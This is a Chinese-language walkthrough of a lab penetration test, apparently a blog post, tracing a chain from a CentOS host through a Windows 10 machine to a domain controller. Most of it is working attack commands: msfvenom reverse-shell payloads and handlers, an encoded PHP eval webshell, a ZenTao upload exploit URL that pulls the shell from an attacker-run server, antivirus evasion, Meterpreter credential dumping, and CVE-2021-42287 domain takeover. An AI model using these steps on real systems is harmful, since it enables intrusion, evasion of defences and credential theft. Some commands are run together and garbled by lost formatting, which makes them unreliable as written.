做暧网站免费,wordpress模板QQ评论,wordpress apache版本,上饶公司网站建设实际部署之后centos7 的ip有所变动分别是 :192.168.127.130以及10.0.20.30
Centos7
老规矩还是先用fscan扫一下服务和端口#xff0c;找漏洞打
直接爆出来一个SSH弱口令…#xff0c;上来就不用打了#xff0c;什么意思#xff1f;#xff1f;#xff1f; 直接xshell…
实际部署之后centos7 的ip有所变动分别是 :192.168.127.130以及10.0.20.30
Centos7
老规矩还是先用fscan扫一下服务和端口找漏洞打
直接爆出来一个SSH弱口令…上来就不用打了什么意思 直接xshell登入生成一个MSF木马然后上线。
上线MSF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST192.168.127.129 LPORT8888 -f elf mshell.elfmsfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.127.129
set lport 8888
run添加路由
run post/multi/manage/autoroute看到另外一个网段
[!] * incompatible session platform: linux
[*] Running module against localhost.localdomain
[*] Searching for subnets to autoroute.
[] Route added to subnet 10.0.20.0/255.255.255.0 from hosts routing table.
[] Route added to subnet 192.168.127.0/255.255.255.0 from hosts routing table.上传Fscan
直接使用msf的命令即可上传
upload /root/home/tools/fscan /tmp/然后执行shell命令获取centos的shell你可能会说都有密码了直接连接不行吗害应急做多了老是会想到ssh有记录。)
/usr/bin/script -qc /bin/bash /dev/null #获得交互式shell然后执行执行扫描的时候需要加上-np因为win10的那一台机器开着防火墙ping不通
cd /tmp
chmod x fscan
./fscan -h 10.0.20.1/24 -np 执行结果我把不相关的直接删除了看重点即可。
[rootlocalhost tmp]# ./fscan -h 10.0.20.1/24 -np___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| __/ _ |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|
\____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1.8.3
start infoscan
10.0.20.66:3306 open
10.0.20.66:8080 open
[*] 扫描结束,耗时: 4m20.058335309s发现内网有一个10.0.20.66并且开放了3306和8080端口先看一下8080端口
WIN10
端口转发
将本地kali的8181端口转发给内网机器10.0.20.66的8080端口
portfwd add -l 8282 -p 8080 -r 10.0.20.66这个时候直接访问kali的8282端口就能访问到10.0.20.66的8181端口了主要是将centos给当跳板了。 访问了一下发现是禅道CMS
账号和密码是弱口令: admin/Admin#123看其他博主爆出来的在后台可以看到版本信息
这个版本存在一个漏洞禅道 12.4.2 后台任意文件上传漏洞 CNVD-C-2020-121325具体漏洞详情不多介绍网上有很多例子。
禅道CMS
在centos中创建一个php
echo PD9waHAgQGV2YWwoJF9QT1NUWydiJ10pOz8 | base64 -d shell.php然后用python开启一个http服务centos内置python为python2版本使用下面命令开启确保shell.php在执行命令的目录内
python -m SimpleHTTPServer 7777构造参数
HTTP://10.0.20.30:7777/shell.php
base64加密一下
SFRUUDovLzEwLjAuMjAuMzA6Nzc3Ny9zaGVsbC5waHA最终的payload是
http://192.168.127.129:8282/index.php?mclientfdownloadversion1linkSFRUUDovLzEwLjAuMjAuMzA6Nzc3Ny9zaGVsbC5waHA请求一下这个url禅道会向刚刚开启的那个HTTP服务请求shell.php并且会保存到data\client\1目录中所以的地址为http://192.168.127.129:8282/data/client/1/shell.php 连接成功木马上线 MSF上线
生成一个反弹shell马因为正向马过不去关防火墙也没权限
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost10.0.20.30 lport7656 -f exe 7656.exe使用蚁剑上传神奇的一幕出现了上传上去立马就没了排查一下进程
tasklist 复制到进程识别工具中https://tasklist.pdsec.top/
发现了火绒程序
免杀
这里直接使用掩日的免杀工具
这个使用起来特别简单直接选择好MSF生成的然后点击生成就会生成一个绕过杀毒软件的木马 MSF启动监听注意这个IP不要再设置为kali的IP了
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.0.20.30
set lport 7656
run然后在蚁剑的终端中运行那个木马程序上线︶↗
再进行一个进程迁移
run post/windows/manage/migrate 添加路由
run post/multi/manage/autoroute发现一个10.0.10.0/255.255.255.0的网段
扫描内网
使用arp扫描一下10.0.10.0/255.255.255.0这个网段的主机
use post/windows/gather/arp_scanner
set rhosts 10.0.10.1-254
set session 3
run在这一步发生了一件比较离谱的事情每次扫描的时候session都会掉
把火绒关了也是如此所以我在想是不是有什么bug于是我换了一种思路直接上传一个fsca然后用fscan扫上传之前我把火绒开启了奇怪的是火绒竟然没有杀掉可能是规则库太老了。 老规矩还是加上-np参数
fscan.exe -h 10.0.10.1/24 -np扫描结果
10.0.10.100:135 open
10.0.10.100:139 open
10.0.10.100:445 open
发现了一个10.0.10.100的主机10.0.10.99是当前主机的IP先进行一下主机信息收集吧
主机信息收集
通过ipconfig /all可以看到主DNS后缀基本上可以判定当前主机为域用户
定位域控 直接使用nslookup解析域名获得域控的IPip为10.0.10.100
抓取Hash
抓取Hash之前需要先提权一下要不然抓不了
提权
直接使用MSF自带的功能即可
getsystem抓取hash
load kiwi
creds_all没有抓取到明文hash
去cmd5里面解析一下NTLM 解密如下
win101 admin#123域控
CVE-2021-42287
由于Active Directory没有对域中计算机与服务器账号进行验证经过身份验证的攻击者利用该漏洞绕过完全限制可将域中普通用户权限提升为域管理员权限并执行任意代码 我们在win10中已经拿到了域成员的账号和密码:win101/admin#123 POC https://github.com/WazeHell/sam-the-admin.git
搭建代理
运行这个POC之前需要先搭建一个代理要不然访问不到
use auxiliary/server/socks_proxy
run然后进行漏洞利用
proxychains python3 sam_the_admin.py vulntarget.com/win101:admin#123 -dc-ip 10.0.10.100 -shell成功拿到域控的shell
思路
Centos没啥好说的弱口令打的Win10是禅道CMS打进去的然后MSF上线免杀用的是掩日的工具添加路由用CVE-2021-42287打的域控脚本一把梭妥妥的脚本小子一个了。
